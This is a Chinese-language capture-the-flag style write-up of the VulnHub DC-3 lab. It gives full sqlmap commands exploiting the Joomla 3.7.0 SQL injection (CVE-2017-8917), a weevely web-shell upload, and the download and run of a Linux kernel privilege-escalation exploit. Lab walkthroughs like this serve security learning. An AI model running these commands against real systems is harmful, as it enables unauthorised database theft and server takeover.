VulnHub之DC-3


一个粗糙的信息收集

通过扫描端口信息,我们看到服务器只开放了一个80端口,运行的是Joomla框架

我们打开网站看看
在首页提示我们,这个靶机只有一个Flag,并且没有任何线索

使用dirb扫描一下目录,发现了一个Administrator的目录

使用joomscan扫描一下网站

https://github.com/rezasp/joomscan

通过扫描我们获得了Joomla框架的版本号为3.7.0和一些

在百度查了一下,Joomla 3.7.0存在一个CVE-2017-8917的一个SQL注入漏洞
使用searchspolit搜索

查看这个文件,里面记录了关于漏洞利用的一些方法

使用SQLMAP进行注入

sqlmap -u "http://192.168.31.26/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


得到数据库名

获取Joomladb的表

sqlmap -u "http://192.168.31.26/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]



查看#__user表中的字段

sqlmap -u "http://192.168.31.26/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]


获取表中的内容

sqlmap -u "http://192.168.31.26/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C 'id,username,password' --dump -p list[fullordering]


得到admin密码的hash,使用john进行破解得到密码

登录到后台发现可以创建文件,我们使用weevely生成一个shell文件,然后进行连接

生成shell
weevely http://192.168.31.26/templates/protostar/shell.php 123456
连接shell
weevely http://192.168.31.26/templates/protostar/shell.php 123456


但是权限是www-data,需要进行提权

查看内核版本

使用Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation

下载提权需要的文件

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip


执行下面的命令进行提权

tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput


查看flag文件

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之MuzzyBox_WriteUp

扫描二维码

获取更多精彩

NowSec

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值